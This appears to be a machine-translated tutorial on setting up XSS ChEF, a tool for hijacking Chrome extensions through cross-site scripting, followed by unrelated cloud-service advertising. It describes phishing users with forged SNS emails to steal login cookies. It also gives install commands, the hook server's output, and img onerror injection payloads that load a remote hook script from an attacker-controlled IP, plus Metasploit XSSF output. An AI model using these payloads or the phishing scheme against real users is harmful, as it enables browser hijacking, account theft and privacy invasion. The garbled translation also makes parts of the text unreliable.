XSS ChEF v1.0 graphic tutorial
We all know that XSS vulnerabilities have two basic forms: saved XSS and reflected XSS. Saved XSS can persist cross-site scripts, if the encoding is not performed when processing user input and the dynamic output content is not encoded when the page is rendered, all users accessing the page will be tempted. The reflected XSS uses a specially crafted url. The url request parameter contains a cross-site script, and the content of the request parameters is directly displayed if the page is not filtered, then the user will be attacked by XSS. XSS Filter is mainly used for reflected XSS attacks. Some people may ask about the reflected XSS. How can someone access such an unknown link? Imagine that an SNS website that prefers spam has an XSS vulnerability and you set Automatic Logon for the website. I want to steal your ID, and I know who you recently fell in love! And she is your friend on this SNS! With this information, it is easy to steal your account. First, I will carefully construct a link with cross-site scripting parameters, and then forge a reminder email from this SNS, who commented on your photo and said you are handsome! The comment link points to this malicious uri, and the modified from header is sent from this SNS website, so you receive this email, even if you have a strong security awareness, but are you sure you can calmly check the URL and then click it? If you click it, I will get your login Cookie or capture some personal privacy content of your SNS! In addition, if I want to steal the numbers of many people, I can replace those who are in the family with those who participate in the XXX activity organized by XXX network and send them to XXX for free, send an email to a zombie group! I believe there are still many people who like free XXX! Therefore, when I was an elementary school student, do not join me in busy areas! Mostly insecure! This principle seems to be suitable for the Internet too!
Chrome introduces XSS Filter to protect users that cannot be relaxed under various temptations, the basic principle of XSS Filter is to compare the request parameters when executing each javascript script. If the javascript script to be executed also exists in the request parameters, the execution of this script will be suspended. This looks good. Of course, there are also many ways to bypass this filter. Some methods have been published by Daniel on the Internet, some of which have been officially fixed, and some have not been fixed yet, there may be a lot of 0-day announcements.
Krzysztof Kotowicz (https://github.com/koto/xsschef) writes a tool, Chrome Terminator: XSS ChEF
Obtain source code
root@Dis9Team:~# cd /var/www/root@Dis9Team:/var/www# git clone https://github.com/koto/xsschef.gitCloning into xsschef...remote: Counting objects: 540, done.remote: Compressing objects: 100% (297/297), done.remote: Total 540 (delta 333), reused 446 (delta 239)Receiving objects: 100% (540/540), 310.97 KiB | 102 KiB/s, done.Resolving deltas: 100% (333/333), done.root@Dis9Team:/var/www/xsschef# lsbootstrap hook.php README.md server-xhr.php toolsconsole.html LICENCE server.js snippets vulnerable_chrome_extensionfavicon.ico php-websocket server.php snippets.xml.php xsschef.jsroot@Dis9Team:/var/www/xsschef#Node.js
It provides two startup Methods: Node. js and PHP, for Node. js is a set of JavaScript toolkit used to compile high-performance network servers. It is easy to understand.
root@Dis9Team:/var/www/xsschef# sudo apt-get install libssl-devroot@Dis9Team:/var/www/xsschef# cd /tmproot@Dis9Team:/tmp# wget http://nodejs.org/dist/v0.8.7/node-v0.8.7-linux-x86.tar.gzroot@Dis9Team:/tmp# tar xf node-v0.8.7-linux-x86.tar.gz.0root@Dis9Team:/tmp# cd node-v0.8.7-linux-x86root@Dis9Team:/tmp/node-v0.8.7-linux-x86# mkdir /usr/local/noderoot@Dis9Team:/tmp/node-v0.8.7-linux-x86# cp -rf * /usr/local/node/root@Dis9Team:/tmp/node-v0.8.7-linux-x86# ln -s /usr/local/node/bin/n* /usr/bin/Installed Components
root@Dis9Team:/tmp/node-v0.8.7-linux-x86/node_modules# cd /usr/local/node/root@Dis9Team:/usr/local/node# npm install websocketroot@Dis9Team:/usr/local/node# npm install node-static
root@Dis9Team:/var/www/xsschef# node server.jsXSS ChEF serverby Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: node server.js [port=8080]Communication is logged to stderr, use node server.js [port] 2>log.txtWed Aug 22 2012 03:20:10 GMT-0700 (PDT) ChEF server is listening on port 8080Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Console URL: http://127.0.0.1:8080/Wed Aug 22 2012 03:20:10 GMT-0700 (PDT) Hook URL: http://127.0.0.1:8080/hook Hook:http://127.0.0.1:8080/hookUI: http://127.0.0.1:8080/
if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}
<img src=x onerror="if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='__HOOK_URL__';d.body.appendChild(e);}">
<img src=x onerror="if(location.protocol.indexOf('chrome')==0){d=document;e=createElement('script');e.src='http://5.5.5.4:8080/hook.php';d.body.appendChild(e);}">
msf > xssf_urls[+] XSSF Server : 'http://10.0.3.15:8888/' or 'http://:8888/'[+] Generic XSS injection: 'http://10.0.3.15:8888/loop' or 'http://:8888/loop'[+] XSSF test page : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html' [+] XSSF Tunnel Proxy : 'localhost:8889'[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main'[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'[+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help'msf >
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
